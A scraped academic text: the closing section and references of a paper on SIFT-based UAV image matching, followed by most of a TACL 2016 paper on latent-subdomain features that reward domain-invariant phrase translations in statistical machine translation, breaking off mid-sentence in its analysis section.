this research method has good anti-interference and high stability, and can be widely used in low-altitude image matching with interference factors. Figure 3. Feature Matching Experiments V. CONCLUSION Based on the preprocessing theory of aerial survey images, this paper studies the extraction method of image features and USES Visual C++ to realize SIFT extraction of image feature points. Brute Force Matcher, a two-dimensional feature point matching method, was selected for image region matching, Use the Find Homography function to set the RANSAC method to eliminate false matches, In this method, the matching accuracy was 91.63%~93.25% (according to the scene illumination) through the experiment of the geological and geomorphological images of a certain scene, and relatively satisfactory matching effect was obtained. However, due to the deficiencies of UAV itself, it is difficult to compare with professional image processing system. With the further development of communication technology and control technology, UAV will have a breakthrough application and development prospect in low-altitude measurement field in the future. REFERENCE [1] SONG Wenping. Research on Integration of Low Altitude Remote Sensing System of UAV and Related Questions of Image Date Processing[D].Xi’an: Chang’an University, 2016.06:38. [2] LI Yifei. Research on PID control in quad rotorcraft[J].Technology and Market, 2016.07:90. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 6 [3] WANG Jianxiong. Study of the key technology of low altitude phootogrammetry of unmanned aerial vehicle and the practice of large scale topography formation[D].Xi’an: Chang’an University, 2011.12:54. [4] YU Huai, YANG Wen. A Fast Feature Extraction and Matching Algorithm for UVA[J].Journal of Electronic &Information Technology, 2016.03:510. [5] D. G. Lowe. Distinctive Image Features from Scale-Invariant Key points[J]. International Journal of Computer Vision, 2014, 60(2):263. [6] LI Xiang, WANG Yongjun, LI Zhi. Inter- TriadMisalignment of Vector Field Sensors in Attitude and Heading Reference Systems and Its Calibration[J]. Chinese Journal of Sensors and Actuators,2017.02:267-270 [7] TAN Xiong, YU Xuchu, LIUJingzheng, HUANG Weijie. Object Fast Tracking Based on Unmanned Aerial Vehicle Video[C]// Proceedings of PACIIA, IEEE Presss, 2010:236. [8] WANG Donghua, YUE Dawei. Design and Implementation of large remote sensing image correction test system [J]. Computer Programming Skills & Maintenance,2015.12:118. [9] Liu Yawei. The review of UAV target detection and tracking method[J]. Aerodynamic Missile Journal, 2016,(9):54-56. [10] D. G. Lowe. Distinctive Image Features from Scale-Invariant Key points[J]. International Journal of Computer Vision.2014, 60(2). [11] CUI Zhe. Image’s characteristic point extraction and matching based on SIFT algorithm[D].Chengdu: University of Electronic Science and Technology of China. 2016.05:21-28. [12] LU Xiaopan. Empirical Study on the Mapping Precision Based on UAV Low-altitude Photogrammetry[D].Beijing: China University of Mining and Technology. 2014.06:53-56. javascript:void(0) work_gcwpgxioqfbr7bhenvqbhu2phy ---- Edinburgh Research Explorer Adapting to All Domains at Once: Rewarding Domain Invariance in SMT Citation for published version: Hoang, C, Sima'an, K & Titov, I 2016, 'Adapting to All Domains at Once: Rewarding Domain Invariance in SMT', Transactions of the Association for Computational Linguistics, vol. 4, pp. 99-112. <https://transacl.org/ojs/index.php/tacl/article/view/768> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://transacl.org/ojs/index.php/tacl/article/view/768 https://www.research.ed.ac.uk/portal/en/publications/adapting-to-all-domains-at-once-rewarding-domain-invariance-in-smt(2cc73492-f3a1-43e2-95b0-5013d2376721).html Adapting to All Domains at Once: Rewarding Domain Invariance in SMT Hoang Cuong and Khalil Sima’an and Ivan Titov Institute for Logic, Language and Computation University of Amsterdam Science Park 107, 1098 XG Amsterdam, The Netherlands {c.hoang,k.simaan,titov}@uva.nl Abstract Existing work on domain adaptation for statis- tical machine translation has consistently as- sumed access to a small sample from the test distribution (target domain) at training time. In practice, however, the target domain may not be known at training time or it may change to match user needs. In such situations, it is natural to push the system to make safer choices, giving higher preference to domain- invariant translations, which work well across domains, over risky domain-specific alterna- tives. We encode this intuition by (1) in- ducing latent subdomains from the training data only; (2) introducing features which mea- sure how specialized phrases are to individual induced sub-domains; (3) estimating feature weights on out-of-domain data (rather than on the target domain). We conduct experiments on three language pairs and a number of differ- ent domains. We observe consistent improve- ments over a baseline which does not explic- itly reward domain invariance. 1 Introduction Mismatch in phrase translation distributions be- tween test data (target domain) and train data is known to harm performance of statistical transla- tion systems (Irvine et al., 2013; Carpuat et al., 2014). Domain-adaptation methods (Foster et al., 2010; Bisazza et al., 2011; Sennrich, 2012b; Raz- mara et al., 2012; Sennrich et al., 2013; Haddow, 2013; Joty et al., 2015) aim to specialize a system estimated on out-of-domain training data to a target domain represented by a small data sample. In prac- tice, however, the target domain may not be known at training time or it may change over time depend- ing on user needs. In this work we address exactly the setting where we have a domain-agnostic system but we have no access to any samples from the tar- get domain at training time. This is an important and challenging setting which, as far as we are aware, has not yet received attention in the literature. When the target domain is unknown at training time, the system could be trained to make safer choices, preferring translations which are likely to work across different domains. For example, when translating from English to Russian, the most natural translation for the word ‘code’ would be highly de- pendent on the domain (and the corresponding word sense). The Russian words ‘xifr’, ‘zakon’ or ‘programma’ would perhaps be optimal choices if we consider cryptography, legal and software devel- opment domains, respectively. However, the transla- tion ‘kod’ is also acceptable across all these domains and, as such, would be a safer choice when the tar- get domain is unknown. Note that such a transla- tion may not be the most frequent overall and, con- sequently, might not be proposed by a standard (i.e., domain-agnostic) phrase-based translation system. In order to encode preference for domain- invariant translations, we introduce a measure which quantifies how likely a phrase (or a phrase-pair) is to be “domain-invariant". We recall that most large parallel corpora are heterogeneous, consisting of di- verse language use originating from a variety of un- specified subdomains. For example, news articles may cover sports, finance, politics, technology and a variety of other news topics. None of the sub- domains may match the target domain particularly 99 Transactions of the Association for Computational Linguistics, vol. 4, pp. 99–112, 2016. Action Editor: Philipp Koehn. Submission batch: 11/2015; Revision batch: 2/2016; Published 4/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. well, but they can still reveal how domain-specific a given phrase is. For example, if we would ob- serve that the word ‘code’ can be translated as ‘kod’ across cryptography and legal subdomains observed in training data, we can hypothesize that it may work better on a new unknown domain than ‘zakon’ which was specific only to a single subdomain (le- gal). This would be a suitable decision if the test domain happens to be software development, even though no texts pertaining to this domain were in- cluded in the heterogeneous training data. Importantly, the subdomains are usually not spec- ified in the heterogeneous training data. Therefore, we treat the subdomains as latent, so we can induce them automatically. Once induced, we define mea- sures of domain specificity, particularly expressing two generic properties: Phrase domain specificity How specific is a target or a source phrase to some of the induced sub- domains? Phrase pair domain coherence How coherent is a source phrase and a target language translation across the induced subdomains? These features capture two orthogonal aspects of phrase behaviour in heterogeneous corpora, with the rationale that phrase pairs can be weighted along these two dimensions. Domain-specificity captures the intuition that the more specific a phrase is to certain subdomains, the less applicable it is in gen- eral. Note that specificity is applied not only to tar- get phrases (as ‘kod’ and ‘zakon’ in the above ex- ample) but also to source phrases. When applied to a source phrase, it may give a preference towards using shorter phrases as they are inherently less do- main specific. In contrast to phrase domain speci- ficity, phrase pair coherence reflects whether can- didate target and source phrases are typically used in the same set of domains. The intuition here is that the more divergent the distributional behaviour of source and target phrases across subdomains, the less certain we are whether this phrase pair is valid for the unknown target domain. In other words, a translation rule with source and target phrases hav- ing two similar distributions over the latent subdo- mains is likely safer to use. Weights for these features, alongside all other standard features, are tuned on a development set. Importantly, we show that there is no noteworthy benefit from tuning the weights on a sample from the target domain. It is enough to tune them on a mixed-domain dataset sufficiently different from the training data. We attribute this attractive prop- erty to the fact that our features, unlike the ones typically considered in standard domain-adaptation work, are generic and only affect the amount of risk our system takes. In contrast, for example, in Ei- delman et al. (2012), Chiang et al. (2011), Hu et al. (2014), Hasler et al. (2014), Su et al. (2015), Sen- nrich (2012b), Chen et al. (2013b), and Carpuat et al. (2014), features capture similarities between a target domain and each of the training subdomains. Clearly, domain adaptation with such rich features, though potentially more powerful, would not be pos- sible without a development set closely matching the target domain. We conduct our experiments on three language pairs and explore adaptation to 9 domain adapta- tion tasks in total. We observe significant and con- sistent performance improvements over the baseline domain-agnostic systems. This result confirms that our two features, and the latent subdomains they are computed from, are useful also for the very chal- lenging domain adaptation setting considered in this work. 2 Domain-Invariance for Phrases At the core of a standard state-of-the-art phrase- based system (Koehn et al., 2003; Och and Ney, 2004) lies a phrase table {〈ẽ, f̃〉} ex- tracted from a word-aligned training corpus together with estimates for phrase translation probabilities Pcount(ẽ| f̃) and Pcount(f̃| ẽ). Typically the phrases and their probabilities are obtained from large paral- lel corpora, which are usually broad enough to cover a mixture of several subdomains. In such mixtures, phrase distributions may be different across different subdomains. Some phrases (whether source or tar- get) are more specific for certain subdomains than others, while some phrases are useful across many subdomains. Moreover, for a phrase pair, the distri- bution over the subdomains for its source side may be similar or not to the distribution for its target side. 100 Source Phrase Projection domain.i... ...domain.1 domain.K Target Phrase Projection Figure 1: The projection framework of phrases into K- dimensional vector space of probabilistic latent subdo- mains. Coherent pairs seem safer to employ than pairs that exhibit different distributions over the subdomains. These two factors, domain specificity and domain coherence, can be estimated from the training cor- pus if we have access to subdomain statistics for the phrases. In the setting addressed here, the subdo- mains are not known in advance and we have to con- sider them latent in the training data. Therefore, we introduce a random variable z ∈ {1, . . . , K} encoding (arbitrary) K latent subdo- mains that generate each source and target phrase ẽ and f̃ of every phrase pair 〈ẽ, f̃〉. In the next Sec- tion, we aim to estimate distributions P(z| ẽ) and P(z| f̃) for subdomain z over the source and target phrases respectively. In other words, we aim at pro- jecting phrases onto a compact (K−1) dimensional simplex of subdomains with vectors: ~̃e = [ P(z = 1| ẽ), . . . , P(z = K| ẽ) ] , (1) ~̃ f = [ P(z = 1| f̃), . . . , P(z = K| f̃) ] . (2) Each of the K elements encodes how well each source and target phrase expresses a specific latent subdomain in the training data. See Fig. 1 for an illustration of the projection framework. Once the projection is performed, the hidden cross-domain translation behaviour of phrases and phrase pairs can be modeled as follows: • Domain-specificity of phrases: A rule with source and target phrases having a peaked distribution over latent subdomains is likely domain-specific. Technically speaking, entropy comes as a natural choice for quantifying domain specificity. Here, we opt for the Renyi entropy and define the do- main specificity as follows: Dα(~̃e) = 1 1−α log ( K∑ i=1 P(z = i| ẽ)α ) Dα( ~̃ f) = 1 1−α log ( K∑ i=1 P(z = i| f̃)α ) For convenience, we refer to Dα(·) as the domain specificity of a phrase. In this study, we choose the value of α as 2 which is the default choice (also known as the Collision entropy). • Source-target coherence across subdomains: A translation rule with source and target phrases having two similar distributions over the latent subdomains is likely safer to use. We use the Chebyshev distance for measuring the similarity between two distributions. The divergence of two vectors ~̃e and ~̃f is defined as follows D(~̃e, ~̃ f) = max i={1,...,K} ∣∣∣P(z = i|ẽ)−P(z = i|f̃) ∣∣∣ We refer to D(~̃e, ~̃f) as the phrase pair coherence across latent subdomains. We investigated some other similarities for phrase pair coherence (the Kullback-Leibler divergence and the Hellinger distance) but have not observed any noticeable improvements in the performance. We will discuss these experiments in the empirical sec- tion. Once computed for every phrase pair, the two measures Dα(~̃e), Dα( ~̃ f) D(~̃e, ~̃ f), will be integrated into a phrase-based SMT system as feature func- tions. 3 Latent Subdomain Induction We now present our approach for inducing latent subdomain distributions P(z| ẽ) and P(z| f̃) for ev- ery source and target phrases ẽ and f̃. In our exper- iments, we compare using our subdomain induction framework with relying on topic distributions pro- vided by a standard topic model, Latent Dirichlet Allocation (Blei et al., 2003). Note that unlike LDA we rely on parallel data and word alignments when 101 inducing domains. Our intuition is that latent vari- ables capturing regularities in bilingual data may be more appropriate for the translation task. Inducing these probabilities directly is rather dif- ficult as the task of designing a fully generative phrase-based model is known to be challenging.1 In order to avoid this, we follow Matsoukas et al. (2009) and Cuong and Sima’an (2014a) who “em- bed" such a phrase-level model into a latent subdo- main model that works at the sentence level. In other words, we associate latent domains with sentence pairs rather than with phrases, and use the posterior probabilities computed for the sentences with all the phrases appearing in the corresponding sentences. Given P(z| e, f) - a latent subdomain model given sentence pairs 〈e,f〉 - the estimation of P(z| ẽ) and P(z| f̃), for phrases ẽ and f̃, can be simplified by computing expectations z for all z ∈{1, . . . , K}: P(z = i|ẽ) = ∑ e,f P(z = i|e,f)c(ẽ; e)∑K i′=1 ∑ e,f P(z = i ′|e,f)c(ẽ; e) , P(z = i|f̃) = ∑ e,f P(z = i|e,f)c(f̃; f)∑K i′=1 ∑ e,f P(z = i ′|e,f)c(f̃; f) . Here, c(ẽ,e) is the count of a phrase ẽ in a sentence e in the training corpus. Latent subdomains for sentences. We now turn to describing our latent subdomain model for sen- tences. We assume the following generative story for sentence pairs: 1. generate the domain z from the prior P(z); 2. choose the generation direction: f-to-e or e-to- f, with equal probability; 3. if the e-to-f direction is chosen then generate the pair relying on P(e| z)P(f| e, z); 4. otherwise, use P(f| z)P(e| f, z). Formally, it is a uniform mixture of the genera- tive processes for the two potential translation di- 1Doing that requires incorporating into the model additional hidden variables encoding phrase segmentation (DeNero et al., 2006). This would significantly complicate inference (Mylon- akis and Sima’an, 2008; Neubig et al., 2011; Cohn and Haffari, 2013). rections.2 This generative story implies having two translation models (TMs) and two language mod- els (LMs), each augmented with latent subdomains. Now, the posterior P(z| e, f) can be computed as P(z| e, f) ∝ P(z) (1 2 P(e| z)P(f| e, z) + 1 2 P(f| z)P(e| f, z) ) . (3) As we aim for a simple approach, our TMs are computed through the introduction of hidden align- ments a and a′ in f-to-e and e-to-f directions re- spectively, in which P(f|e, z) = ∑ a P(f, a|e, z) and P(e| f, z) = ∑ a′ P(e, a ′| f, z). To make the marginalization of alignments tractable, we re- strict P(f, a| e, z) and P(e, a′| f, z) to the same assumptions as IBM Model 1 (Brown et al., 1993) (i.e., a multiplication of translation of lexical proba- bilities with respect to latent subdomains). We use standard nth-order Markov model for P(e| z) and P(f| z), in which P(e| z) = ∏ i P(ei| e i−1 i−n, z) and P(f| z) =∏ j P(fj| f j−1 j−n, z). Here, the notation e i−1 i−n and fj−1j−n is used to denote the history of length n for the source and target words ei and fj, respec- tively. Training. For training, we maximize the log- likelihood L of the data L = ∑ e,f log (∑ z P(z) (1 2 P(e|z) ∑ a P(f,a|e,z) + 1 2 P(f| z) ∑ a′ P(e,a′| f, z) )) . (4) As there is no closed-form solution, we use the expectation-maximization (EM) algorithm (Demp- ster et al., 1977). In the E-step, we compute the posterior distribu- 2Note that we effectively average between them which is reasonable, as there is no reason to give preference to any of them. 102 tions P(a, z| e, f) and P(a′, z| e, f) as follows P(a, z| e, f) ∝ P(z) ( P(e| z)P(f, a| e, z) + P(f| z) ∑ a′ P(e, a′| f, z) ) , (5) P(a′, z| e, f) ∝ P(z) ( P(e| z) ∑ a P(f, a| e, z) + P(f| z)P(e, a′| f, z) ) . (6) In the M-step, we use the posteriors P(a, z|e, f) and P(a′, z| e, f) to re-estimate parameters of both alignment models. This is done in a very similar way to estimation of the standard IBM Model 1. We use the posteriors to re-estimate LM parame- ters as follows P(ei|ei−11 ,z) ∝ ∑ e,f P(z|e,f)c(ei1; e), (7) P(fi|fi−11 ,z) ∝ ∑ e,f P(z|e,f)c(fi1; f). (8) To obtain better parameter estimates for word pre- dictions and avoid overfitting, we use smoothing in the M-step. In this work, we chose to apply expected Kneser-Ney smoothing technique (Zhang and Chi- ang, 2014) as it is simple and achieves state-of-the- art performance on the language modeling problem. Finally, P(z) can be simply estimated as follows P(z) ∝ ∑ e, f P(z| e, f) (9) Hierarchical Training. In practice, we found that training the full joint model leads to brittle perfor- mance, as EM is very likely to get stuck in bad lo- cal maxima. To address this difficulty, in our im- plementation, we start out by first jointly training P(z), P(e| z) and P(f| z). In this way in the E-step, we fix our model parameters and compute P(z| e, f) for every sentence pair: P(z| e, f) ∝ P(e| z)P(f| z)P(z). In the M-step, we use the pos- teriors to re-estimate the model parameters, as in Equations (7), (8) and (9). Once the model is trained, we fix the language modeling parameters and finally train the full model. This parallel latent subdomain language model is less expressive and, consequently, is less likely to get stuck in a local maximum. The LMs estimated in this way will then drive the full alignment model to- wards better configurations in the parameter space.3 In practice, this training scheme is particularly use- ful in case of learning a more fine-grained latent sub- domain model with larger K. 4 Experiments Training Data English French Sents 5.01M Words 103.39M 125.81M English Spanish Sents 4.00M Words 81.48M 89.08M English German Sents 4.07M Words 93.19M 88.48M Table 1: Data Preparation. 4.1 Data We conduct experiments with large-scale SMT sys- tems across a number of domains for three lan- guage pairs (English-Spanish, English-German and English-French). The datasets are summarized in Table 1. For English-Spanish, we run experiments with training data consisting of 4M sentence pairs collected from multiple resources within the WMT 2013 MT Shared Task. These include EuroParl (Koehn, 2005), Common Crawl Corpus, UN Cor- pus, and News Commentary. For English-German, our training data consists of 4.1M sentence pairs collected from the WMT 2015 MT Shared Task, in- cluding EuroParl, Common Crawl Corpus and News Commentary. Finally, for English-French, we train SMT systems on a corpus of 5M sentence pairs col- lected from the WMT 2015 MT Shared Task, includ- ing the 109 French-English corpus. We conducted experiments on 9 different domains (tasks) where the data was manually collected by a TAUS.4 Table 2 presents the translation tasks: each of the tasks deals with a specific domain, each of this task has presumably a very different relevance level 3This procedure can be regarded as a form of hierarchical estimation: we start with a simpler model and then use it to drive a more expressive model. Note that we also use P (z) estimated within the parallel latent subdomain LMs to initialize P (z) for the latent subdomain alignment model. 4https://www.taus.net/. 103 English French Professional &Business Services Dev Sents 2K Words 74.16K 83.85K Test Sents 5K Words 92.84K 105.05K Leisure, Tourism and Arts Dev Sents 2K Words 107.45K 117.16K Test Sents 5K Words 101.82K 114.76K English Spanish Professional &Business Services Dev Sents 2K Words 31.70K 34.62K Test Sents 5K Words 84.1K 93.4K Legal Dev Sents 2K Words 35.06K 38.78K Test Sents 5K Words 88.63K 102.71K Financials Dev Sents 2K Words 37.23K 42.89K Test Sents 5K Words 99.05K 109.81K English German Professional &Business Services Dev Sents 2K Words 80.49K 85.08K Test Sents 5K Words 79.75K 85.28K Legal Dev Sents 2K Words 50.54K 45.99K Test Sents 5K Words 124.93K 111.70K Computer Software Dev Sents 2K Words 40.24K 38.31K Test Sents 5K Words 102.71K 101.12K Computer Hardware Dev Sents 2K Words 37.40K 36.98K Test Sents 5K Words 103.29K 98.04K Table 2: Data and adaptation tasks. to the training data. In this way, we test the stability of our results across a wide range of target domains. 4.2 Systems We use a standard state-of-the-art phrase-based sys- tem. The Baseline system includes MOSES (Koehn et al., 2007) baseline feature functions, plus eight hi- erarchical lexicalized reordering model feature func- tions (Galley and Manning, 2008). The training data is first word-aligned using GIZA++ (Och and Ney, 2003) and then symmetrized with grow(-diag)- final-and (Koehn et al., 2003). We limit the phrase length to the maximum of seven words. The lan- guage models are interpolated 5-grams with Kneser- Ney smoothing, estimated by KenLM (Heafield et al., 2013) from a large monolingual corpus of nearly 2.1B English words collected within the WMT 2015 MT Shared Task. Finally, we use MOSES as a de- coder (Koehn et al., 2007). Our system is exactly the same as the base- line, plus three additional feature functions induced for the translation rules: two features for domain- specificity of phrases (both for the source side (Dα( ~̃ f)) and the target side (Dα(~̃e)), and one fea- ture for source-target coherence across subdomains (D(~̃e, ~̃f)). For the projection, we use K=12. We also explored different values for K, but have not observed significant difference in the scores. In our experiments we do one iteration of EM with paral- lel LMs (as described in Section 3), before contin- uing with the full model for three more iterations. We did not observe a significant improvement from running EM any longer. Finally, we use hard EM, as it has been found to yield better models than the standard soft EM on a number of different task (e.g., (Johnson, 2007)). In other words, instead of stan- dard ‘soft’ EM updates with phrase counts weighted according to the posterior P(z = i| e, f), we use the ‘winner-takes-all’ approach: P(z = i| ẽ)∝ ∑ 〈e,f〉 c(i; ẑ〈e,f〉)δ(ẽ; e), P(z = i| f̃) ∝ ∑ 〈e,f〉 c(i; ẑ〈e,f〉)δ(f̃; f). Here, ẑ〈e, f〉 is the “winning" latent subdomain for sentence pair 〈e, f〉: ẑ〈e, f〉 = argmax i∈{1, ..., K} P(z = i| e, f) In practice, we found that using this hard version leads to better performance.5 4.3 Alternative tuning scenarios In order to tune all systems, we use the k-best batch MIRA (Cherry and Foster, 2012). We report the translation accuracy with three metrics - BLEU 5A more principled alternative would be to use posterior reg- ularization (Ganchev et al., 2009). 104 Task System BLEU↑ /∆ METEOR↑ /∆ TER↓ /∆ English-French Professional & Business Services Baseline 21.4 28.8 60.0 Our System 21.5/+0.1 28.9/+0.1 59.7/-0.3 Leisure, Tourism and Arts Baseline 39.9 36.7 48.1 Our System 40.8/+0.9 37.1/+0.4 47.1/-1.0 English-Spanish Financials Baseline 32.5 37.1 45.6 Our System 32.8/+0.3 37.2/+0.1 45.4/-0.2 Professional & Business Services Baseline 24.4 31.7 54.9 Our System 24.8/+0.4 31.9/+0.2 54.8/-0.1 Legal Services Baseline 33.3 36.3 49.5 Our System 33.8/+0.5 36.5/+0.2 49.1/-0.4 English-German Computer Software Baseline 22.8 27.7 64.3 Our System 23.1/+0.3 27.8/+0.1 64.0/-0.3 Computer Hardware Baseline 20.5 27.7 61.2 Our System 20.9/+0.4 27.9/+0.2 61.1/-0.1 Professional & Business Services Baseline 15.3 25.4 69.2 Our System 15.7/+0.4 25.6/+0.2 68.6/-0.6 Legal Services Baseline 29.6 32.9 55.6 Our System 30.2/+0.6 33.3/+0.4 55.1/-0.5 Table 3: Adaptation results when tuning on the in-domain development set. The bold face indicates that the improvement over the baseline is significant. Task System BLEU↑ /∆ METEOR↑ /∆ TER↓ /∆ English-French Professional & Business Services Baseline 20.7 28.3 59.5 Our System 20.7/+0.0 28.4/+0.1 59.4/-0.1 Leisure, Tourism and Arts Baseline 39.7 37.0 48.6 Our System 40.6/+0.9 37.4/+0.4 47.4/-1.2 English-Spanish Financials Baseline 33.6 37.5 45.4 Our System 34.0/+0.4 37.7/+0.2 45.0/-0.4 Professional & Business Services Baseline 24.4 31.9 55.3 Our System 24.9/+0.5 32.0/+0.1 54.9/-0.4 Legal Services Baseline 32.4 35.8 49.0 Our System 32.9/+0.5 36.0/+0.2 48.8/-0.2 English-German Computer Software Baseline 23.2 27.6 63.4 Our System 23.5/+0.3 27.8/+0.2 63.0/-0.4 Computer Hardware Baseline 20.8 27.8 61.5 Our System 21.0/+0.2 28.0/+0.2 61.2/-0.3 Professional & Business Services Baseline 13.8 25.2 72.2 Our System 13.9/+0.1 25.3/+0.1 72.1/-0.1 Legal Services Baseline 29.3 32.7 55.2 Our System 29.9/+0.6 33.1/+0.4 54.6/-0.6 Table 4: Adaptation results when tuning on the mixed-domain development set. The bold face indicates that the improvement over the baseline is significant. (Papineni et al., 2002), METEOR (Denkowski and Lavie, 2011) and TER (Snover et al., 2006). We mark an improvement as significant when we ob- tain the p-level of 5 % under paired bootstrap resam- pling (Koehn, 2004). Note that better results corre- spond to larger BLEU and METEOR but to smaller TER. For every system reported, we run the opti- mizer at least three times, before running MultEval 105 (Clark et al., 2011) for resampling and significance testing. Note that the scores for the systems are av- erages over multiple runs. For tuning the systems we explore two kinds of development sets: (1) An in-domain develop- ment set of in-domain data that directly exempli- fies the translation task (i.e., a sample of target- domain data), and (2) a mixed-domain development set which is a full concatenation of development sets from all the available domains for a language pair; this scenario is a more realistic one when no in- domain data is available. In the analysis section we also test these two scenarios against the scenario mixed-domain minus in-domain, which excludes the in-domain development set part from the mixed- domain development set. By exploring the three dif- ferent development sets we hope to shed light on the importance of having samples from the target do- main when using our features. If our features can indeed capture domain invariance of phrases then they should improve the performance in all three set- tings, including the most difficult setting where the in-domain data has been explicitly excluded from the tuning phase. 4.4 Main results In-domain tuning scenario. Table 3 presents the results for the in-domain development set scenario. The integration of the domain-invariant feature functions into the baseline results in a significant improvement across all domains: average +0.50 BLEU on two adaptation tasks for English-French, +0.40 BLEU on three adaptation tasks for English- Spanish and +0.43 BLEU on four adaptation tasks for English-German. Mixed-domain tuning scenario. While the im- provements are robust and consistent for the in- domain development set scenario, we are espe- cially delighted to see a similar improvement for the mixed-domain tuning scenario (Table 4). In de- tail, we observe an average +0.45 BLEU on two adaptation tasks for English-French, +0.47 BLEU on three adaptation tasks for English-Spanish and +0.30 BLEU on four adaptation tasks for English- German. We would like to emphasize that this performance improvement is obtained without tun- ing specifically for the target domain or using other domain-related meta-information in the training cor- pus. Additional analysis We investigate the individual contribution of each domain-invariance feature. We conduct experiments using a basic large-scale phrase-based system de- scribed in Koehn et al. (2003) as a baseline. The baseline includes two bi-directional phrase-based models (Pcount(ẽ| f̃) and Pcount(f̃| ẽ)), three penal- ties for word, phrase and distortion, and finally, the language model. On top of the baseline, we build four different systems, each augmented with a domain-invariance feature. The first feature is the source-target coherence feature, D(ẽ, f̃), where we use the Chebyshev distance as our default options. We also investigate the performance of other metrics including the Hellinger distance,6 and the Kullback- Leibler divergence.7 Our second and third features are the domain specificity of phrases on the source Dα(f̃) and on the target Dα(ẽ) sides. Finally, we also deploy all these three domain-invariance fea- tures Dα(f̃) + Dα(ẽ) + D(ẽ, f̃)). The experi- ments are conducted for the task Legal on English- German. English-German (Task: Legal) Dev System BLEU↑ In- domain Baseline 28.8 +D(ẽ, f̃) 29.1/+0.3 +Dα(ẽ) 29.4/+0.6 +Dα(f̃) 29.8/+1.0 +Dα(f̃) + Dα(ẽ) + D(ẽ, f̃) 29.9/+1.1 Mixed- domains Baseline 28.5 +D(ẽ, f̃) 28.8/+0.3 +Dα(ẽ) 29.3/+0.8 +Dα(f̃) 29.6/+1.1 +Dα(f̃) + Dα(ẽ) + D(ẽ, f̃) 29.8/+1.3 Mixed- domains (Exclude Legal) Baseline 28.3 +D(ẽ, f̃) 28.6/+0.3 +Dα(ẽ) 29.1/+0.8 +Dα(f̃) 29.5/+1.2 +Dα(f̃) + Dα(ẽ) + D(ẽ, f̃) 29.6/+1.3 Table 5: Improvements over the baseline. The bold fact indicates that the difference is statistically sig- nificant. 6DH(~̃e, ~̃ f) = 1√ 2 √ ∑ z (√ P (z| ẽ) − √ P (z| f̃) )2 . 7DKL(~̃e, ~̃ f) = ∑ z P (z| ẽ) log P(z| ẽ) P(z| f̃) ; DKL( ~̃ f, ~̃e) = ∑ z P (z| f̃) log P(z| f̃) P(z| ẽ) . 106 German-English (Task: Legal Services) Input im jahr 2004 befindet der rat über die verpflichtung der elektronischen übertragung solcher aufzeichnungen. Reference the council shall decide in 2004 on the obligation to transmit such records electronically. Baseline in 2004 the council is the obligation on the electronic transfer of such records. + Dα(f̃) in 2004 the council is on the obligation of electronic transfer of such records. + Dα(ẽ) in 2004 the council is on the obligation of electronic transmission of such records. + D(ẽ, f̃) in 2004 the council is on the obligation of electronic transmission of such records. + ALL in 2004 the council is on the obligation of electronic transmission of such records. Input die angemessenheit und wirksamkeit der internen verwaltungssysteme sowie die leistung der dienststellen Reference for assessing the suitability and effectiveness of internal management systems and the performance of de- partments Baseline the adequacy and effectiveness of internal administrative systems as well as the performance of the services + Dα(f̃) the adequacy and effectiveness of the internal management systems, as well as the performance of the services + Dα(ẽ) the adequacy and effectiveness of internal management systems, as well as the performance of the services + D(ẽ, f̃) the adequacy and effectiveness of the internal administrative systems as well as the performance of the services + ALL the adequacy and effectiveness of internal management systems, as well as the performance of the services Input zur ausführung der ausgaben nimmt der anweisungsbefugte mittelbindungen vor, geht rechtliche verpflich- tungen ein Reference to implement expenditure, the authorising officer shall make budget commitments and legal commitments Baseline the implementation of expenditure, the authorising officer commitments before, is a legal commitments + Dα(f̃) the implementation of expenditure, the authorising officer commitments, is a legal obligations + Dα(ẽ) the implementation of expenditure, the authorising officer commitments before, is a legal obligations + D(ẽ, f̃) the implementation of expenditure, the authorising officer commitments before, is a legal commitments + ALL the implementation of expenditure, the authorising officer commitments before, is a legal obligations Table 7: Translation outputs produced by the basic baseline and its augmented systems with additional abstract feature functions derived from hidden domain information. English-German (Task: Legal) Dev Metric BLEU↑ In-domain Chebyshev 29.1/+0.3 Kullback-Leibler (DKL(~̃e, ~̃ f)) 29.2/+0.4 Kullback-Leibler (DKL( ~̃ f, ~̃e)) 29.0/+0.2 Hellinger 29.0/+0.2 Table 6: Using different metrics as the measure of coherence. Table 5 and Table 6 present the results. Overall, we can see that all domain-invariance features con- tribute to adaptation performance. Specifically, we observe the following: • Favouring the source-target coherence across sub- domains (i.e., adding the feature D(ẽ, f̃)) pro- vides a significant translation improvement of +0.3 BLEU. Which specific similarity measure is used does not seem to matter that much (see Table 6). We obtain the best result (+0.4 BLEU) with the KL divergence (DKL(~̃e, ~̃ f)). However, the differences are not statistically significant. • Integrating a preference for less domain-specific translation phrases at the target side (Dα(ẽ)) leads to a translation improvement of +0.6 BLEU. • Doing the same for the source side (Dα(f̃)), in turn, leads to an improvement of +1.0 BLEU. • Augmenting the baseline by integrating all our features leads to the best result, with an improve- ment of +1.1 BLEU. • The translation improvement is observed also for training with a development set of mixed domains (even for the mixed-domain minus in-domain setting when excluding the Legal data from the mixed development set). • The weights for all domain-invariance features, once tuned, are positive in all the experiments. Table 7 presents examples of translations from different systems. For example, the domain- invariant system revises the translation from "elec- tronic transfer" to "electronic transmission" for the 107 English-German Task Baseline Our System +z1 +z2 +z3 +z4 +z5 +z6 +z7 +z8 +z9 +z10 +z11 +z12 Hardware 20.2 20.4 20.4 20.4 20.5 20.5 20.5 20.4 20.4 20.5 20.4 20.4 20.4 Software 22.8 23.0 23.0 23.0 22.8 22.9 23.1 23.0 23.0 23.0 23.0 23.0 22.8 P&B Services 13.3 13.6 13.6 13.3 13.5 13.6 13.6 13.5 13.5 13.6 13.5 13.6 13.5 Legal 28.5 28.7 28.6 29.1 28.7 28.6 28.9 28.8 28.8 28.9 28.6 28.6 28.8 Table 8: Latent Subdomain Analysis (with BLEU score). German phrase "elektronischen Übertragung", and from "internal administrative systems" to "internal management systems" for the German phrase "in- ternen verwaltungssysteme". The revisions, how- ever, are not always successful. For instance, adding Dα(ẽ) and Dα(f̃) resulted in revising the translation of the German phrase "rechtliche 